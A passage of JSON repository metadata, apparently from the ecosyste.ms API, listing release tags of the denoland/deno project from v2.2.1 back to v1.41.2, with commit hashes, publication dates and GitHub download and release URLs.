rl":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":